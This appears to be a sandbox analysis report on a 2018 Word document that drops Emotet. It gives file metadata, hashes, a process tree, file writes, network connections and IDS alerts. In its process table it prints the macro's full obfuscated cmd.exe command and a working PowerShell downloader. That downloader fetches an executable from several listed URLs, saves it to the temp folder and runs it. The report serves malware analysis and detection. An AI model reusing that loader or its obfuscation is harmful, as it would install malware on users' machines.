File name: | DOCP50669.doc |
Full analysis: | https://app.any.run/tasks/b3a751b9-c65a-47e1-856a-eed866b06972 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 12:44:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Abby, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 11:53:00 2018, Last Saved Time/Date: Wed Nov 14 11:53:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0 |
MD5: | DDA6F58EF9C8AEB422F707E9644E963E |
SHA1: | D2B184A8FF8376CBC2DF4A97F83B60BA4300C4B9 |
SHA256: | 1771A1ACE8C8EE6896AF0B4ED0CA6B0F4539C9B095E55B223C7D5795FE768CE2 |
SSDEEP: | 1536:Qk/TxjwKZ09cB7y9ghN8+mQ90MT++a9aTjpre5gx8P5pF5pVeFq:rxjnB29gb8onVPpre5gx8P5pF5pVeFq |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Abby |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 11:53:00 |
ModifyDate: | 2018:11:14 11:53:00 |
Pages: | 1 |
Words: | - |
Characters: | 2 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 2 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1388 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCP50669.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2252 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,^2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2^,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2^,47,^3^4,59^,^42^,^2^,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2^,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3^,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28^,^1^2^,^29,5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2604 | powershell $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1380 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1548 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | mQN.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2240 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | mQN.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3820 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. |
PID | Process | Filename | Type | |
---|---|---|---|---|
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR92C5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74DCPC5Z3STEDPNW7RXL.temp | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$CP50669.doc | pgc | |
MD5:5DB47F5E643BCC3E680EF769C93F39D4 | SHA256:70DD06FE9DF0A71ACE21603EDAEF2B774679CCBD28A691C4C96852D5841DF17E | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da208.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2604 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mQN.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
1548 | mQN.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2604 | powershell.exe | GET | 200 | 66.55.141.67:80 | http://trabanatours.com/u/ | US | executable | 448 Kb | malicious |
2604 | powershell.exe | GET | 301 | 66.55.141.67:80 | http://trabanatours.com/u | US | html | 234 b | malicious |
3820 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2604 | powershell.exe | 66.55.141.67:80 | trabanatours.com | Choopa, LLC | US | suspicious |
3820 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
trabanatours.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2604 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2604 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
2604 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3820 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |